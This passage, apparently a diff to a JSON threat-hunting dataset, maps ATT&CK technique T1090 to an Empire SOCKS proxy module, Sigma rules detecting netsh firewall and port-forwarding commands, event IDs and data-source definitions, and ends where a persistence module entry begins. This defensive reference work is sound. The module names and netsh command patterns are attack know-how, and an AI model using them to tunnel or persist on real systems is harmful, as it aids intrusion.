"host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module 
load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://pan-unit42.github.io/playbook_viewer/", + "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview", + "https://docs.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1090", + "command_list": [ + "python/management/multi/socks" + ], + "commands": [ + { + "command": "python/management/multi/socks", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire 
Module": "python/management/multi/socks", + "ATT&CK Technique #1": "T1090", + "ATT&CK Technique #2": "", + "Technique": "Connection Proxy", + "Concatenate for Python Dictionary": "\"python/management/multi/socks\": [\"T1090\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Netsh", + "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "description": "Allow Incoming Connections by Port or Application on Windows Firewall", + "references": [ + "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf" + ], + "date": "2019/01/29", + "tags": [ + "attack.lateral_movement", + "attack.command_and_control", + "attack.t1090" + ], + "status": "experimental", + "author": "Markus Neis", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*netsh firewall add*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administration" + ], + "level": "medium" + }, + { + "title": "Netsh Port Forwarding", + "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", + "description": "Detects netsh commands that configure a port forwarding", + "references": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" + ], + "date": "2019/01/29", + "tags": [ + "attack.lateral_movement", + "attack.command_and_control", + "attack.t1090" + ], + "status": "experimental", + "author": "Florian Roth", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "netsh interface portproxy add v4tov4 *" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administration" + ], + "level": "medium" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Netflow/Enclave netflow" + ], + [ 
+ "Packet capture" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Packet capture" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://www.justice.gov/file/1080281/download", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + null + ] + }, + { + "technique_id": "T1157", + "command_list": [ + "python/persistence/osx/CreateHijacker", + 
